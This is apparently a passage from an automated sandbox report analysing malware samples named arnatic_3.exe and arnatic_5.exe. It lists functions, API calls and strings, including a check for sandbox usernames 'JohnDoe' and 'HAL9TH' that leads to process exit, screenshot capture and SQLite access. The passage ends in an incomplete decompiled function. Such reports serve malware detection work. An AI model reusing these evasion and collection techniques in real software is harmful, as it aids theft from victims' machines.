__flsbuf.LIBCMT ref: 0046A808

Part of subcall function 0046DC0D: __getptd_noexit.LIBCMT ref: 0046DC0D

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 45e30a5c6d15ccf6f6093055bca8f0c72a9ec6000df9520e141d9de558c7de32
Instruction ID: a58e273e4cecb89ac9e59fdd5b54ca9601d39f9d4a01f6af3f943429a2897095
Opcode Fuzzy Hash: 45e30a5c6d15ccf6f6093055bca8f0c72a9ec6000df9520e141d9de558c7de32
Instruction Fuzzy Hash: 8941E831A00B049BDB249FA9C44465FB7B1AF80355F24852FE455A7240F778ED62CF5B

Uniqueness

Uniqueness Score: -1.00%

Function 0047C5DA, Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0047C60E
__isleadbyte_l.LIBCMT ref: 0047C641
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000), ref: 0047C672
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000), ref: 0047C6E0

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 218fbecc06522fde4826945415fd43a243574de00f0eba107f09c706a40ce051
Instruction ID: 71a9f8c2d52005495b6dda15ea221eca3b61b573109255b6164804ec8bab4819
Opcode Fuzzy Hash: 218fbecc06522fde4826945415fd43a243574de00f0eba107f09c706a40ce051
Instruction Fuzzy Hash: 2031AC31A00246EFCB20DF64C8C4DFE7BA5AF01310B14D96EE4699B2A1E734DD80DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00464590, Relevance: 6.1, APIs: 4, Instructions: 100timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004645E0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00464610
GetLocalTime.KERNEL32(?), ref: 0046463D
SystemTimeToFileTime.KERNEL32(?,?), ref: 0046464B

Part of subcall function 004640BA: GetFileInformationByHandle.KERNEL32(?,?), ref: 004640EF

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID:
API String ID: 3986731826-0
Opcode ID: 774d21edc2f8779b795becb3ee428777bc4b241df5828654dc186ee0beb8852e
Instruction ID: 34f92d1420f16ff1d105999a055e3b6ef11e4bc1d368788e3857c9443cf72c09
Opcode Fuzzy Hash: 774d21edc2f8779b795becb3ee428777bc4b241df5828654dc186ee0beb8852e
Instruction Fuzzy Hash: 03315371900B099FCB21DF69C8809AFFBF8FB49304B104A2FE196D2650E779E905CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0046009E, Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 004600B5
_malloc.LIBCMT ref: 004600C8
_free.LIBCMT ref: 0046014A

Part of subcall function 00469CB4: HeapFree.KERNEL32(00000000,00000000,?,0047028E,00000000,?,?,00467630,00000001,00000000,?,?,?,0046768E,00402DA3), ref: 00469CCA
Part of subcall function 00469CB4: GetLastError.KERNEL32(00000000,?,0047028E,00000000,?,?,00467630,00000001,00000000,?,?,?,0046768E,00402DA3), ref: 00469CDC

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: EncodersErrorFreeGdipHeapImageLastSize_free_malloc
String ID:
API String ID: 34177290-0
Opcode ID: 81e7a6484f8d8151a5ada2989b7200c78a7d025de7c3113795f6a3b520f2c2b6
Instruction ID: 01432b48db9c3acd704eabccbcf6d9319bc79f8246b59b32d3ae4030db32dbb3
Opcode Fuzzy Hash: 81e7a6484f8d8151a5ada2989b7200c78a7d025de7c3113795f6a3b520f2c2b6
Instruction Fuzzy Hash: 3B21A172C00018EBCF25DFA5C9414EFBBB9EF25764B214297E811A7281F7369F41D686

Uniqueness

Uniqueness Score: -1.00%

Function 00404B35, Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404B3C
_strtok.LIBCMT ref: 00404B50

Part of subcall function 004688DD: __getptd.LIBCMT ref: 004688FB

CreateDirectoryA.KERNEL32(?,00000000,004867F4,00000001,00000000,?,?,?,?,?,?,00000024), ref: 00404B8E
_strtok.LIBCMT ref: 00404B99

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _strtok$CreateDirectoryH_prolog3___getptd
String ID:
API String ID: 2807274917-0
Opcode ID: 7542c7bb343e34de49b734f35bd3769de20db11e2203c38dea5e3089de44d176
Instruction ID: 6b84bdaaca704ff04d2fa0487533279a3539b39ab3ba5d7ee7c99212798628d2
Opcode Fuzzy Hash: 7542c7bb343e34de49b734f35bd3769de20db11e2203c38dea5e3089de44d176
Instruction Fuzzy Hash: 920152B1D04209AEDB04FBE5DC96EEE7778AB04304F50842FF210B71C1DA7895448B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0047C4C7, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00473D9D,00000000,00000000,74E05970,?,00469ECB,0040FD33,00000000,?,?,?,?,?,?,00000000), ref: 0047C4CA
__malloc_crt.LIBCMT ref: 0047C4F9
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,00000000,?,00469ECB,0040FD33,00000000,?,?,?,?,?,?,00000000,74E481D0), ref: 0047C506

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 7b3825d6faa72477602e96b0986fb543b5721989161d9eec496d5e7cee175909
Instruction ID: 90f23b334c8ed7159c63dcdd12ea6bcd790e9e68d034c32d4f9a06000d927db2
Opcode Fuzzy Hash: 7b3825d6faa72477602e96b0986fb543b5721989161d9eec496d5e7cee175909
Instruction Fuzzy Hash: 40F08977504120AA8B317B35BCD98FB5739DBD176531AC46FF409C3241F6298E8287A9

Uniqueness

Uniqueness Score: -1.00%

Function 00460277, Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00460292
GetFileSizeEx.KERNEL32(00000000,?), ref: 004602AA
CloseHandle.KERNEL32(00000000), ref: 004602B5
CloseHandle.KERNEL32(00000000), ref: 004602BD

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 52ee9af0e4d272adebe8ceddfa3e02de93de0e35db65c026b63c00b4c1fbe4a7
Instruction ID: 5d1364c8a31567de6e7b324fab4a7a1a03799f4cb7a69e3f1e74f986f7ccf7e3
Opcode Fuzzy Hash: 52ee9af0e4d272adebe8ceddfa3e02de93de0e35db65c026b63c00b4c1fbe4a7
Instruction Fuzzy Hash: 22F05E35640214BBE6609B64EC0DF9F3A68EB06B65F204265FA11A21D4F770AE01866A

Uniqueness

Uniqueness Score: -1.00%

Function 004605FD, Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

numpunct.LIBCPMT ref: 00460600
__CxxThrowException@8.LIBCMT ref: 00460609

Part of subcall function 00467D31: RaiseException.KERNEL32(?,?,00402DB8,?,?,?,?,?,00402DB8,?,00495E98,00000000), ref: 00467D73

GdipCloneImage.GDIPLUS(00000000,00000000), ref: 00460621
GdipAlloc.GDIPLUS(00000010,00000000,00000000), ref: 0046062F

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Gdip$AllocCloneExceptionException@8ImageRaiseThrownumpunct
String ID:
API String ID: 2212125544-0
Opcode ID: b3c210346b3484d2296e71a4240d16dde6cf502290e4b35a675585a54e4d3cd7
Instruction ID: 89a92ad6f540c1bd4995b90dec0499c255a504946c2a18e833c79a3c0d072663
Opcode Fuzzy Hash: b3c210346b3484d2296e71a4240d16dde6cf502290e4b35a675585a54e4d3cd7
Instruction Fuzzy Hash: A1F054B0500305AFDB149B51DD42A6B76ACEF40358F14846EA90657251FB78ED40D659

Uniqueness

Uniqueness Score: -1.00%

Function 00440F61, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 235COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00441029
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00441071

Strings

recovered %d pages from %s, xrefs: 004411B2

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: recovered %d pages from %s
API String ID: 885266447-1623757624
Opcode ID: ff4fb86d793dcb59eee48b0dae6a9bc87a22199431b754dfc1e1ff5aee7ef138
Instruction ID: 5185f3a40f6f292f2ef864a00bd81fa9213b99b2aaf1ac0b477065cce46a119a
Opcode Fuzzy Hash: ff4fb86d793dcb59eee48b0dae6a9bc87a22199431b754dfc1e1ff5aee7ef138
Instruction Fuzzy Hash: C181AD71A003059FEF20DBA4C881BAFB7F4AF18314F10042EE652A3791D7B9A9C5CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0044E1D1, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0044E37C

Strings

too many levels of trigger recursion, xrefs: 0044E21A
out of memory, xrefs: 0044F021

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _memset
String ID: out of memory$too many levels of trigger recursion
API String ID: 2102423945-3387558265
Opcode ID: 079f78c1e5c6b768bc2ba9b438988c6e924b6437cb617efaa9ae34cbe72d3770
Instruction ID: 67024021857f9bca9ffcbc185dd9200876a79cc49cb356c6bd59da330a78ef85
Opcode Fuzzy Hash: 079f78c1e5c6b768bc2ba9b438988c6e924b6437cb617efaa9ae34cbe72d3770
Instruction Fuzzy Hash: F3815DB5A04615CFDB28CF15D490B99BBB1FF48300F2481AED80A9B796DB34E851CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00404591, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004045D6
_memmove.LIBCMT ref: 00404607

Strings

string too long, xrefs: 004045D1

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: e72cae2fc8034c74023ae1fc89c363bdb2c6facc4b3c753c82b0a16192e4272f
Instruction ID: 5613efae1da860e4bd67d14d38d7ae5f87a4d6e762a65273e71fdf7398001a45
Opcode Fuzzy Hash: e72cae2fc8034c74023ae1fc89c363bdb2c6facc4b3c753c82b0a16192e4272f
Instruction Fuzzy Hash: E2119371304650ABD6349E2D8A5092BB7F5EFC1704B140D3FB282672C1DB79D805876A

Uniqueness

Uniqueness Score: -1.00%

Function 00462470, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00462477
std::_Xinvalid_argument.LIBCPMT ref: 0046248E

Part of subcall function 0046647A: std::exception::exception.LIBCMT ref: 0046648F
Part of subcall function 0046647A: __CxxThrowException@8.LIBCMT ref: 004664A4
Part of subcall function 0046647A: std::exception::exception.LIBCMT ref: 004664B5

Strings

vector<T> too long, xrefs: 00462489

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8H_prolog3_catchThrowXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 1877048013-3788999226
Opcode ID: 5b57af60f137962226b02563de55a09edbee1448f826ffdbc64505f8dfc6608a
Instruction ID: d4349fbfd05d76f908887b054911efc121d5a3179ab686ca53f097fb2792c682
Opcode Fuzzy Hash: 5b57af60f137962226b02563de55a09edbee1448f826ffdbc64505f8dfc6608a
Instruction Fuzzy Hash: DD113A76600701AFCB24EF69CD81E1ABBE5AF40704F11882FF58987241FA75E940CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040CACA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040CB10
_memmove.LIBCMT ref: 0040CB46

Strings

string too long, xrefs: 0040CB0B

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 179732534aa3b0e69cfcc00b8577e650f052752151c321a60f5ccec584991d37
Instruction ID: 90e801ef41aa2b3457a41928719f4f407296c078f61fcd9cd80a281b133b5ad0
Opcode Fuzzy Hash: 179732534aa3b0e69cfcc00b8577e650f052752151c321a60f5ccec584991d37
Instruction Fuzzy Hash: F111AB31304600DBC520EF6D9985E1BB7B5AF857147110B2FB441B32C1EB38A909CAED

Uniqueness

Uniqueness Score: -1.00%

Function 00404249, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 0045F39E: GetUserNameA.ADVAPI32(?,?), ref: 0045F3D3

ExitProcess.KERNEL32 ref: 004042CA

Strings

JohnDoe, xrefs: 0040426E
HAL9TH, xrefs: 004042A5

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: ExitNameProcessUser
String ID: HAL9TH$JohnDoe
API String ID: 282088302-3469431008
Opcode ID: e3c5fc00bd96921ed500329d7e691254307a018e3a129c3c5533e680241507fc
Instruction ID: 2fd9cbe3d4084af56062ad72188c420f7fe9e837bb71f92b454cdadfdd79a78c
Opcode Fuzzy Hash: e3c5fc00bd96921ed500329d7e691254307a018e3a129c3c5533e680241507fc
Instruction Fuzzy Hash: FB01A9717442085FEB04EBA5D986FDD73A4EB08704F40047FF502B71E1DE789948C669

Uniqueness

Uniqueness Score: -1.00%

Function 0042CAB1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0042CAF1

Part of subcall function 0042C721: _memset.LIBCMT ref: 0042C763

Strings

DELETE FROM %Q.%s WHERE %s=%Q, xrefs: 0042CB14
sqlite_stat%d, xrefs: 0042CAE9

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: __fprintf_l_memset
String ID: DELETE FROM %Q.%s WHERE %s=%Q$sqlite_stat%d
API String ID: 4274417252-3667113883
Opcode ID: 23e98e5578176d063cee010cecb1423713e138e5d09547b2028ba7c4d24c4d1d
Instruction ID: 4ad98c4016dc621019a83e9931137e2368fd5b2260dc9d2bb8412567c18ceb15
Opcode Fuzzy Hash: 23e98e5578176d063cee010cecb1423713e138e5d09547b2028ba7c4d24c4d1d
Instruction Fuzzy Hash: 70114C71A00119ABCF00DFDADC81ADEB7B9EF48318F54046AE505A7241E735A905CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00402EBC

Part of subcall function 004664C7: std::exception::exception.LIBCMT ref: 004664DC
Part of subcall function 004664C7: __CxxThrowException@8.LIBCMT ref: 004664F1
Part of subcall function 004664C7: std::exception::exception.LIBCMT ref: 00466502

_memmove.LIBCMT ref: 00402EF7

Strings

invalid string position, xrefs: 00402EB7

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 0b99120ca0aa774b2b70ef45524ce9dcce24b85bc7fc93b43d78a423e3668027
Instruction ID: ef11f907a277f64a4fd4dd07bcbbf4ccaf113397e5fce8ced11c0c53f2c8addf
Opcode Fuzzy Hash: 0b99120ca0aa774b2b70ef45524ce9dcce24b85bc7fc93b43d78a423e3668027
Instruction Fuzzy Hash: 9301B5313042114BD724DD6CCA8841BB3B6EBC57007704D3EE482A73C5DBB8EC4697A9

Uniqueness

Uniqueness Score: -1.00%

Function 00426C0F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00426C49

Strings

%!.15g, xrefs: 00426C3F
%lld, xrefs: 00426C31

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: __fprintf_l
String ID: %!.15g$%lld
API String ID: 3906573944-2983862324
Opcode ID: de5b57d0eded13f22f4d0afbbb33aa3753b4fdbfc02808270fcf999871fb9a23
Instruction ID: 17e8dba0bf4f930bad794c816e73cb0777d2f0f9a1024114737b842faf481313
Opcode Fuzzy Hash: de5b57d0eded13f22f4d0afbbb33aa3753b4fdbfc02808270fcf999871fb9a23
Instruction Fuzzy Hash: C301DFB1708B11AED731ABAAD806B27BBE0EF08700F558C1FF4E6851D2C76CE0809719

Uniqueness

Uniqueness Score: -1.00%

Function 00460155, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0045FEEA: GdipAlloc.GDIPLUS(00000010,00460171,?,00000000), ref: 0045FEEC

Part of subcall function 0046009E: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 004600B5

GdipSaveImageToFile.GDIPLUS(?,screenshot.jpg,?,00000000), ref: 00460192

Strings

image/jpeg, xrefs: 00460177
screenshot.jpg, xrefs: 0046018A

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Gdip$Image$AllocEncodersFileSaveSize
String ID: image/jpeg$screenshot.jpg
API String ID: 2572949680-3715547155
Opcode ID: 95858f0442bd41d69360f1a0505b13db83bef8b2f425f658b7a70d94d77afb0e
Instruction ID: 26f744356a124897cdf31e04d79cd09986ceed7a1a5280b884140b57400f285a
Opcode Fuzzy Hash: 95858f0442bd41d69360f1a0505b13db83bef8b2f425f658b7a70d94d77afb0e
Instruction Fuzzy Hash: FCF06270600204ABCB10EBA5CC42B9B77E8DF04704F50046AF505E7191EA65EA04876A

Uniqueness

Uniqueness Score: -1.00%

Function 004602F7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00460327
__CxxThrowException@8.LIBCMT ref: 0046033C

Part of subcall function 00467CB1: _malloc.LIBCMT ref: 00467CCB

Strings

8-@, xrefs: 00460335

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 8-@
API String ID: 4063778783-2211411525
Opcode ID: 26dd87a5e1ffe0e445da585706cc491088a08bf93ae973a065a6bcb56d0cbc27
Instruction ID: 96eeef590752f268908aaeb0fa486bc56ce9032c9325e1a5e8ab77c3ad7e4bd5
Opcode Fuzzy Hash: 26dd87a5e1ffe0e445da585706cc491088a08bf93ae973a065a6bcb56d0cbc27
Instruction Fuzzy Hash: BBE0E53151060D67CF18FBAAC461AAF3BAC5F00709F10442FE80195241FB78D244479A

Uniqueness

Uniqueness Score: -1.00%

Function 00402DBA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00402DEA
__CxxThrowException@8.LIBCMT ref: 00402DFF

Part of subcall function 00467CB1: _malloc.LIBCMT ref: 00467CCB

Strings

8-@, xrefs: 00402DF8

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 8-@
API String ID: 4063778783-2211411525
Opcode ID: 68fbfafd7ac0fe5a4c5bbaceea492c9a47d2e2de93e2aba0b665c26ae983a623
Instruction ID: 570d070ef6ea47d9dcb174ff45f514ebf16f7c737f04619d40129963265afc91
Opcode Fuzzy Hash: 68fbfafd7ac0fe5a4c5bbaceea492c9a47d2e2de93e2aba0b665c26ae983a623
Instruction Fuzzy Hash: C2E065715006096BCF14EBA9C595ADE37AC6F0035CF60853FE511E15C0FB78DA458B99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: arnatic_5.exe PID: 4816 Parent PID: 6592 arnatic_5.exeCOMMON

Executed Functions

Function 00EAF5C0, Relevance: 59.8, APIs: 25, Strings: 8, Instructions: 2078
registryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00EAF5C0(char __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _v80;
				char _v84;
				char* _v88;
				char _v92;
				char* _v96;
				char _v100;
				char* _v104;
				char _v108;
				char* _v112;
				char _v116;
				char _v120;
				void* _v124;
				char* _v128;
				char _v132;
				char* _v136;
				char _v140;
				char* _v144;
				char _v148;
				char* _v152;
				char _v156;
				char* _v160;
				char _v164;
				char* _v168;
				char _v172;
				char* _v176;
				char _v180;
				signed int _v184;
				signed int _v188;
				char* _v192;
				char* _v196;
				char _v200;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				char* _v288;
				char _v292;
				char* _v296;
				char _v300;
				char* _v304;
				char _v308;
				char* _v312;
				char _v316;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				void* _v328;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v353;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				signed int _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char* _v444;
				signed int _v448;
				char _v452;
				char _v456;
				char* _v460;
				char _v464;
				char* _v468;
				char _v472;
				char* _v476;
				char _v480;
				char* _v484;
				char* _v488;
				char* _v492;
				char* _v496;
				char* _v500;
				char* _v504;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				char _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				char _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				char _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				char _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				char _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				char _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				char _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				intOrPtr _v788;
				intOrPtr _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				char _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				intOrPtr _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v888;
				char _v892;
				signed int _v896;
				char _v900;
				char* _v904;
				char* _v908;
				char* _v912;
				char* _v916;
				char* _v920;
				signed int _v924;
				signed int _v928;
				signed int _v932;
				char* _v936;
				void* __ebx;
				void* __edi;
				void* __ebp;
				int _t1046;
				long _t1055;
				intOrPtr* _t1064;
				intOrPtr _t1066;
				int _t1071;
				int _t1072;
				int _t1073;
				int _t1095;
				int _t1101;
				signed int _t1104;
				int _t1105;
				int _t1106;
				int _t1107;
				intOrPtr _t1111;
				int _t1116;
				int _t1117;
				int _t1118;
				intOrPtr _t1140;
				int _t1152;
				int _t1153;
				intOrPtr _t1156;
				int _t1164;
				int _t1165;
				void* _t1204;
				signed int _t1245;
				void* _t1251;
				intOrPtr* _t1252;
				int _t1294;
				long _t1302;
				intOrPtr* _t1312;
				char* _t1315;
				void* _t1321;
				intOrPtr* _t1322;
				int _t1328;
				int _t1334;
				intOrPtr _t1338;
				signed int _t1343;
				intOrPtr* _t1368;
				char _t1375;
				void* _t1381;
				intOrPtr* _t1382;
				intOrPtr* _t1383;
				char _t1386;
				void* _t1392;
				void* _t1394;
				char _t1396;
				void* _t1402;
				intOrPtr* _t1415;
				intOrPtr* _t1417;
				char _t1420;
